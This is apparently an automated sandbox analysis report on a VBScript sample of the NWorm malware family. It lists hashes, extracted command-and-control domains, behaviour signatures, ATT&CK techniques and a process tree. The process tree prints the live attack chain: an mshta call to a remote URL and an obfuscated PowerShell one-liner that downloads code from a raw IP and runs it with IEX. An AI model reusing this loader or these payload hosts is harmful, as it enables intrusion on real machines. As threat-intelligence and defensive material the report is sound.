Analysis

  • max time kernel
    160s
  • max time network
    159s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-en-20220112
  • submitted
    15-02-2022 05:00

General

  • Target

    7c1862829839b836c1c21bb92e65316c1148efefab2028eccf91231bc50fe2c2.vbs

  • Size

    6KB

  • MD5

    74f58ac31a1f70bb4c704f31074882c0

  • SHA1

    247ab701feff34cef747bf8e388b3639b8af9084

  • SHA256

    7c1862829839b836c1c21bb92e65316c1148efefab2028eccf91231bc50fe2c2

  • SHA512

    14e0e9a5f63e6b3807378a297146ba08ebdfbc73ff3ed27741761b22d53d3be59bcaa5ff2e06caa6d8d6f2e9d0f6fef9c530260d80fb61d50ea8ad904d990169

Score
10/10

Malware Config

Extracted

Family

nworm

Version

v0.3.8

C2

nyanmoj.duckdns.org:5057

moneyhope81.duckdns.org:5057

Mutex

cb2d3cba

Signatures

  • NWorm

    A TrickBot module used to propagate to vulnerable domain controllers.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 3 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies data under HKEY_USERS 50 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\7c1862829839b836c1c21bb92e65316c1148efefab2028eccf91231bc50fe2c2.vbs"
    1⤵
      PID:1640
    • C:\Windows\system32\msHta.exe
      msHta.exe HttP://3.22.248.2/qw/EncGQE.txt
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:2132
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $HQPIRTNLNVVNENVTOSFOQPX = '[\6$@5=3#6_&86}<!6#+@86y\6$@5=3#6_&86}<!6#+@86t^($+0)+*\]^26/7=-57)$8[#9@-!=-\{&9]2/5!995](.IO.\6$@5=3#6_&86}<!6#+@86t\)6)6%-\+27-+}/$$$+)=)^($+0)+*\]^26/7=-57)$8=4_14%)*6(=8+{&_%7{17$[#9@-!=-\{&9]2/5!995](\)6)6%-\+27-+}/$$$+)=)^($+0)+*\]^26/7=-57)$8=4_14%)*6(=8+{&_%7{17$d^($+0)+*\]^26/7=-57)$8\)6)6%-\+27-+}/$$$+)=)]'.Replace('\6$@5=3#6_&86}<!6#+@86','S').Replace('^($+0)+*\]^26/7=-57)$8','E').Replace('\)6)6%-\+27-+}/$$$+)=)','R').Replace('=4_14%)*6(=8+{&_%7{17$','A').Replace('[#9@-!=-\{&9]2/5!995](','M');$HRTEUQOOTFTZLQAZFWAURIJ = ($HQPIRTNLNVVNENVTOSFOQPX -Join '')|&('I'+'EX');$HZSOPPIHHQLRYYEQVBEDSUX = '[1$56\-<^}+$099--+0}#_/y1$56\-<^}+$099--+0}#_/}({+@((<0%\3==8$3+)0<#=#\%+0[^=2*8#}8($/-$/}m.N=#\%+0[^=2*8#}8($/-$/}}({+@((<0%\3==8$3+)0<#.W=#\%+0[^=2*8#}8($/-$/}bR=#\%+0[^=2*8#}8($/-$/}qu=#\%+0[^=2*8#}8($/-$/}1$56\-<^}+$099--+0}#_/}({+@((<0%\3==8$3+)0<#]'.Replace('1$56\-<^}+$099--+0}#_/','S').Replace('=#\%+0[^=2*8#}8($/-$/}','E').Replace('}({+@((<0%\3==8$3+)0<#','T');$HOHVKHWHGAYHFLLBDNQFERO = ($HZSOPPIHHQLRYYEQVBEDSUX -Join '')|&('I'+'EX');$HUXHSFRXTJGUNPZKBAKQKDB = '7-0=!*[88^$]!&^-<0=!40r+6^1809#8_[3#9!*7&%/(}a8&_{*!#&(*%\348!!*/}8{+6^1809#8_[3#9!*7&%/(}'.Replace('7-0=!*[88^$]!&^-<0=!40','C').Replace('+6^1809#8_[3#9!*7&%/(}','E').Replace('8&_{*!#&(*%\348!!*/}8{','T');$HDGSFNUEFWTDNIWVCKPZGAN = '1847$$37[6=[//!%=/1+29)^67!]6\<-*%^$_!]<%#=9tR)^67!]6\<-*%^$_!]<%#=97759<]}1}&=-))27371/7/pon7759<]}1}&=-))27371/7/)^67!]6\<-*%^$_!]<%#=9'.Replace('1847$$37[6=[//!%=/1+29','G').Replace(')^67!]6\<-*%^$_!]<%#=9','E').Replace('7759<]}1}&=-))27371/7/','S');$HPLQTYQUTWSSOTBNQTGWCJW = 'G=-{19_]8@-38\_}33$<}92t60!3610=]928-+4{4@5<9{=-{19_]8@-38\_}33$<}920^%\{#218_*!9/22]03/\2pon0^%\{#218_*!9/22]03/\2=-{19_]8@-38\_}33$<}920^%\{#218_*!9/22]03/\2t60!3610=]928-+4{4@5<9{=-{19_]8@-38\_}33$<}92am'.Replace('0^%\{#218_*!9/22]03/\2','S').Replace('=-{19_]8@-38\_}33$<}92','E').Replace('60!3610=]928-+4{4@5<9{','R');$HIPJLQVQFSETDTUGXWWOVEN = '821#8{8)<4-+*%_7^[/_]}6_\4<00(_0{#202{{&^89/a^34)4\]92(]$[!%5}\0#$%To6_\4<00(_0{#202{{&^89/n^34)4\]92(]$[!%5}\0#$%'.Replace('821#8{8)<4-+*%_7^[/_]}','R').Replace('6_\4<00(_0{#202{{&^89/','E').Replace('^34)4\]92(]$[!%5}\0#$%','D');&('I'+'EX')($HRTEUQOOTFTZLQAZFWAURIJ::new($HOHVKHWHGAYHFLLBDNQFERO::$HUXHSFRXTJGUNPZKBAKQKDB('HttP://3.22.248.2/qw/Ps1HJ.txt').$HDGSFNUEFWTDNIWVCKPZGAN().$HPLQTYQUTWSSOTBNQTGWCJW()).$HIPJLQVQFSETDTUGXWWOVEN())
        2⤵
        • Blocklisted process makes network request
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1624
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
          3⤵
            PID:3868
      • C:\Windows\system32\MusNotifyIcon.exe
        %systemroot%\system32\MusNotifyIcon.exe NotifyTrayIcon 13
        1⤵
        • Checks processor information in registry
        PID:3700
      • C:\Windows\System32\svchost.exe
        C:\Windows\System32\svchost.exe -k NetworkService -p
        1⤵
        • Drops file in Windows directory
        • Modifies data under HKEY_USERS
        PID:3156
      • C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
        C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
        1⤵
        • Drops file in Windows directory
        • Suspicious use of AdjustPrivilegeToken
        PID:3052

      Network

      MITRE ATT&CK Matrix ATT&CK v6

      Discovery

      Query Registry

      2
      T1012

      System Information Discovery

      3
      T1082

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • memory/1624-131-0x0000016C79933000-0x0000016C79935000-memory.dmp
        Filesize

        8KB

      • memory/1624-136-0x0000016C7AA90000-0x0000016C7AAB2000-memory.dmp
        Filesize

        136KB

      • memory/1624-140-0x0000016C7AA53000-0x0000016C7AA55000-memory.dmp
        Filesize

        8KB

      • memory/1624-139-0x0000016C7AA50000-0x0000016C7AA52000-memory.dmp
        Filesize

        8KB

      • memory/1624-141-0x0000016C7AA56000-0x0000016C7AA58000-memory.dmp
        Filesize

        8KB

      • memory/1624-142-0x0000016C7ADE0000-0x0000016C7ADFA000-memory.dmp
        Filesize

        104KB

      • memory/3868-143-0x0000000000400000-0x000000000040A000-memory.dmp
        Filesize

        40KB

      • memory/3868-147-0x0000000074B4E000-0x0000000074B4F000-memory.dmp
        Filesize

        4KB

      • memory/3868-149-0x0000000005070000-0x0000000005071000-memory.dmp
        Filesize

        4KB